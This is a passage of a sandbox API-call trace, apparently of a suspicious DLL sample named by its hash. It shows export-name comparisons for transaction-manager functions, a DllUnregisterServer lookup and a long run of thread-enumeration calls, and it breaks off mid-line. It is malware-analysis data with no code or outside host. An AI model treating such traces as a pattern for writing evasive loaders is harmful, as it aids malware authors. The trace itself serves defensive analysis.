lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0097.822] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0097.822] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0097.823] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0097.823] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0097.824] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0097.824] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0097.824] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0097.824] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0097.824] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0097.824] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0097.824] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0097.824] GetProcessHeap () returned 0x570000 [0097.824] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2db5030 | out: hHeap=0x570000) returned 1 [0097.835] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0097.835] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0097.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x2db5030 [0097.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x28) returned 0x578630 [0097.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DllUnregisterServer", cchWideChar=-1, lpMultiByteStr=0x578630, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DllUnregisterServer", lpUsedDefaultChar=0x0) returned 20 [0097.838] GetLastError () returned 0x0 [0097.838] SetLastError (dwErrCode=0x0) [0097.838] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="DllUnregisterServerW") returned 0x0 [0097.838] GetLastError () returned 0x7f [0097.838] SetLastError (dwErrCode=0x7f) [0097.838] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="DllUnregisterServerA") returned 0x0 [0097.838] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="DllUnregisterServer") returned 0x7ffc45e91160 [0097.838] GetActiveWindow () returned 0x0 [0097.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2db5030 | out: hHeap=0x570000) returned 1 [0097.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578630 | out: hHeap=0x570000) returned 1 [0097.842] GetCurrentProcessId () returned 0x484 [0097.842] GetCurrentThreadId () returned 0x1290 [0097.842] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0097.857] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0097.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0097.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0097.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0097.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0097.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.333] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.333] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.334] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.671] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.671] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.672] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.673] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.673] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.674] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.675] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.676] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.683] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0098.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.395] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.396] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.399] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.400] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.407] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.409] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.409] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.411] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.413] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.426] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.427] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.428] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.429] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.430] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.430] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.431] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.432] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.433] Thread32Next 